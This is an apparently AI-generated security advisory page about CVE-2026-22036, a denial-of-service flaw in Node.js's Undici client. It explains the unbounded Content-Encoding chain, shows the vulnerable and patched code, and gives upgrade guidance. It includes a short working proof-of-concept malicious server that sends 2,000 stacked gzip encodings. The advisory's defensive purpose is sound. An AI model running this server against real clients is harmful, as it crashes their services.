CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.


© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-22036
CVSS 5.9 · EPSS 0.02%

Suffocating Node.js: The Undici Decompression DoS (CVE-2026-22036)

Amit Schendel
Senior Security Researcher

Feb 19, 2026 · 5 min read

PoC Available

Executive Summary (TL;DR)

Undici didn't limit the number of 'Content-Encoding' layers in a response. An attacker can send 'gzip, gzip, gzip...' 2,000 times, causing the client to build 2,000 stream objects, leading to a crash.

Node.js's high-performance HTTP client, Undici, contains a critical oversight in how it handles stacked compression schemes. By responding with a maliciously crafted 'Content-Encoding' header, an attacker can force the client to allocate thousands of decompression streams instantly. This results in a resource exhaustion loop that spikes CPU usage and drains memory, effectively killing the Node.js process.

The Hook: Meet the New Boss

If you've been using Node.js recently, you've likely touched Undici without even knowing it. It's the engine under the hood of the global fetch() implementation introduced in Node 18. It was built for speed—stripping away the bloat of the legacy http module to give developers raw performance.

But here's the thing about performance-obsessed code: sometimes it assumes the other side of the connection is playing nice. Undici trusts the server to tell it how to decode the incoming data. If the server says, "Hey, this payload is gzipped," Undici spins up a zlib stream to handle it.

Now, ask yourself: What happens if the server is a sociopath? What if it says, "This data is gzipped... and then gzipped again... and again..." for about three thousand layers? Before CVE-2026-22036, Undici would look at that request, nod enthusiastically, and try to build a decompression pipeline that reaches the moon.

The Flaw: Infinite Matryoshka Dolls

The vulnerability lies in the DecompressHandler. The HTTP specification (RFC 7231) allows for multiple content encodings. This is useful if you want to compress a file and then encrypt it, or apply a legacy compression followed by a modern one. The header looks like this:

Content-Encoding: gzip, br

The receiving client is supposed to peel these layers back one by one. Undici implemented this by splitting the header string on commas and iterating over the result: for every token it found, it instantiated a new transform stream, then piped them all together.

The fatal flaw? No speed limit.

There was absolutely no check on how many encodings were listed. If a malicious server sent a header with 5,000 gzip tokens, Undici's loop would dutifully create 5,000 heavy zlib objects. This isn't just a logic error; it's an invitation for a resource exhaustion attack. It's like ordering a single coffee but specifying 10,000 pumps of vanilla syrup—the barista (your CPU) is going to have a breakdown trying to fulfill the order.
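The parsing step itself is a one-liner, which is part of why the missing bound went unnoticed. This sketch (not undici's actual source) shows how each comma-separated token becomes one decompression stage, with nothing capping the count:

```javascript
// Sketch of the parsing step described above (not undici's actual source):
// each comma-separated token becomes one decompression stage, with no cap.
const header = 'gzip, gzip, gzip, gzip, gzip, gzip';
const layers = header.split(',').map(token => token.trim());
console.log(layers.length); // six tokens means six zlib streams on a vulnerable client
```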

The Code: The Smoking Gun

Let's look at the crime scene. The vulnerable code in lib/interceptor/decompress.js was deceptively simple. It took the header, split it, and mapped it to streams.

// Vulnerable Implementation
#createDecompressionChain (encodings) {
  const parts = encodings.split(',') 
  // ⚠️ DANGER: No check on parts.length!
  const decompressors = parts.map(encoding => this.#getDecompressor(encoding))
  // ... piping logic ...
}

It’s clean code, but it’s naive. It assumes parts will be a reasonable number, like 1 or 2.

The fix, applied in commit b04e3cb, introduces a hard reality check. It aligns Undici with other hardened clients like curl by imposing a strict limit.

// Patched Implementation
#createDecompressionChain (encodings) {
  const parts = encodings.split(',')
 
  // The sanity check we were missing
  const maxContentEncodings = 5
  if (parts.length > maxContentEncodings) {
    throw new Error(`too many content-encodings: ${parts.length}`)
  }
  // ...
}

If you try to pass more than 5 layers now, Undici throws an error before allocating a single byte of memory for streams. Attack neutralized.
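The guard is easy to reproduce standalone. The sketch below mirrors the commit's logic as described above; the function name is illustrative, not undici's API.

```javascript
// Standalone sketch of the patched guard (mirrors the commit's logic as
// described above; the function name is illustrative, not undici's API).
function assertSaneEncodingCount (encodingHeader, maxContentEncodings = 5) {
  const parts = encodingHeader.split(',')
  if (parts.length > maxContentEncodings) {
    throw new Error(`too many content-encodings: ${parts.length}`)
  }
  return parts.map(p => p.trim())
}
```

Calling it with 'gzip, br' returns the two tokens; a 2,000-layer header throws before a single stream is built.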

The Exploit: Death by a Thousand Gzips

Exploiting this is trivial if you control the server (or can mount a man-in-the-middle attack). You don't even need to send a massive body; processing the header alone is enough to degrade the target.
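The asymmetry is what makes this attractive to an attacker. A quick sketch of the cost: a 2,000-layer header is only about 12 KB of text, yet it demands 2,000 stream allocations from a vulnerable client.

```javascript
// The attacker's cost is trivial: a 2,000-layer header is only ~12 KB of text,
// yet it demands 2,000 stream allocations from a vulnerable client.
const abuse = Array(2000).fill('gzip').join(', ');
console.log(abuse.length);
```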

Here is a conceptual Proof of Concept (PoC) for a malicious Node.js server designed to kill a vulnerable Undici client:

const http = require('http');
 
const server = http.createServer((req, res) => {
  // Create a string of "gzip, " repeated 2000 times
  const abuse = Array(2000).fill('gzip').join(', ');
  
  res.writeHead(200, {
    'Content-Type': 'text/plain',
    'Content-Encoding': abuse // The payload
  });
  
  res.end('Goodbye memory.');
});
 
server.listen(1337);

When a vulnerable client calls fetch('http://malicious-server:1337'), it parses that header. The DecompressHandler immediately attempts to construct 2,000 stream instances.

In Node.js, streams are expensive. They allocate buffers and bind event listeners. Doing this thousands of times synchronously blocks the event loop. The CPU spikes to 100%, and the Garbage Collector goes into a panic spiral trying to manage the sudden allocation frenzy. For a single-threaded runtime like Node, this is game over.

The Fix: Stopping the Bleeding

This isn't a vulnerability you can easily "configure" away without touching the code, because the flaw is in the library's core logic. The only real path forward is upgrading.

If you use Undici directly: Update to version 6.23.0 or 7.18.0. These versions include the hard limit of 5 encodings.

If you use Node.js fetch: You are at the mercy of the Node.js release cycle. You need to update your Node.js runtime to a version that bundles the patched Undici. Check the release notes for your Node version to ensure it includes the relevant Undici security update.
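A quick way to see what you are running: modern Node exposes the bundled undici version at runtime, which you can compare against the fixed versions (6.23.0 / 7.18.0) noted above.

```javascript
// Quick runtime check (Node 18+): print the undici version bundled with this
// Node.js runtime, then compare it against the fixed versions above.
console.log(`bundled undici: ${process.versions.undici}`);
```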

Workaround (The Band-Aid): If you cannot update immediately and are sitting behind a reverse proxy (like Nginx or AWS WAF), you can try to inspect the Content-Encoding header of incoming responses from upstream services (if your Node app is acting as a proxy) or limit the header size. However, since this exploits the client (your app making outgoing requests), network-level mitigation is harder unless you proxy all your outgoing traffic through a smart gateway that sanitizes response headers.

Official Patches

Node.js: Commit limiting content-encoding depth


Technical Appendix

CVSS Score
5.9 / 10
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Probability
0.02%
Top 95% most exploited

Affected Systems

  • Node.js applications using `fetch()`
  • Applications using the `undici` package < 6.23.0
  • Applications using the `undici` package >= 7.0.0, < 7.18.0

Affected Versions Detail

Product          | Affected Versions  | Fixed Version
undici (Node.js) | < 6.23.0           | 6.23.0
undici (Node.js) | >= 7.0.0, < 7.18.0 | 7.18.0
Attribute        | Detail
CWE ID           | CWE-770
Attack Vector    | Network
CVSS             | 5.9 (Medium)
Impact           | Denial of Service
Exploit Maturity | PoC Available
Fix Complexity   | Low (Update)

MITRE ATT&CK Mapping

T1499: Endpoint Denial of Service (Impact)

CWE-770: Allocation of Resources Without Limits or Throttling

Known Exploits & Detection

GitHub Advisory: advisory containing a technical description and a regression test case

Vulnerability Timeline

2026-01-06: Fix committed by Matteo Collina
2026-01-14: CVE Published / Patch Released
2026-01-22: NVD Analysis Updated

References & Sources

  • [1] GHSA-g9mf-h72j-4rw9
  • [2] NVD Entry for CVE-2026-22036

Attack Flow Diagram
